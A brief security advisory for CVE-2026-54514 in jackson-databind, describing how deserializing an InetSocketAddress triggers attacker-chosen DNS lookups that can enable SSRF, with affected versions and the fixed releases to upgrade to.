CVE-2026-54514

Name of the Vulnerable Software and Affected Versions jackson-databind versions 2.0.0 through 2.18.7 jackson-databind versions 2.19.0 through 2.21.3 jackson-databind versions 3.0.0 through 3.1.3

Description The JDKFromStringDeserializer function constructs InetSocketAddress using new InetSocketAddress(host, port), which triggers eager DNS name resolution for hostname inputs during deserialization. When an application binds untrusted JSON into a type containing an InetSocketAddress field, it issues an attacker-chosen DNS query during the readValue process, occurring before any application-level validation or connection logic. This can lead to Server-Side Request Forgery (SSRF), where an attacker forces outbound DNS lookups for chosen hostnames to perform out-of-band interaction or internal-resolver probing.

Recommendations Update to version 2.18.8 for versions in the 2.18 line. Update to version 2.21.4 for versions in the 2.19 through 2.21 line. Update to version 3.1.4 for versions in the 3.x line.